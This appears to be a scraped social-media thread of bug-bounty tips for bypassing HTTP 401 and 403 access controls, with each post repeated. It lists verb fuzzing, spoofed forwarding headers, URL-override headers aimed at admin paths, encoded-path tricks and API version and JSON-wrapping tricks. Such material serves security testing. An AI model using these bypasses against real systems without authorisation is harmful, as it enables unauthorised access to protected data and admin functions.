Vuln: 403 & 401 Bypasses
Severity: High
HTTP 401 and 403 are both status codes that indicate that a client's request to a server was not successful.
401 -- client provides no credentials or invalid credentials
403 -- not enough privileges
#bugbountytips #securitytips
1/n
Severity: High
HTTP 401 and 403 are both status codes that indicate that a client's request to a server was not successful.
401 -- client provides no credentials or invalid credentials
403 -- not enough privileges
#bugbountytips #securitytips
1/n
Techniques to bypass 403 & 401:
HTTP Verbs/Methods Fuzzing:
Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Using a HTTP header like:
X-HTTP-Method-Override: PUT can overwrite the verb used.
2/n
HTTP Verbs/Methods Fuzzing:
Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Using a HTTP header like:
X-HTTP-Method-Override: PUT can overwrite the verb used.
2/n
HTTP Headers Fuzzing:
- Change Host header to an arbitrary value
- Try to use other User Agents to access the resource.
- Fuzz HTTP Headers:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
etc.
3/n
- Change Host header to an arbitrary value
- Try to use other User Agents to access the resource.
- Fuzz HTTP Headers:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
etc.
3/n
If the path is protected you can try to bypass the path protection using these other headers:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Remove the Host header and maybe you will be able to bypass the protection.
4/n
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Remove the Host header and maybe you will be able to bypass the protection.
4/n
Path Fuzzing:
Try using /%2e/path_(if the access is blocked by a proxy, this could bypass the protection)
Try _**/%252e**/path (double URL encode)
Try Unicode bypass: /%ef%bc%8f path (The URL encoded chars are like "/")
Other path bypasses:
5/n
Try using /%2e/path_(if the access is blocked by a proxy, this could bypass the protection)
Try _**/%252e**/path (double URL encode)
Try Unicode bypass: /%ef%bc%8f path (The URL encoded chars are like "/")
Other path bypasses:
5/n
API bypasses:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
6/6
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Unauthriozied
{“id”:{“id”:111}} --> 200 OK
6/6
Loading suggestions...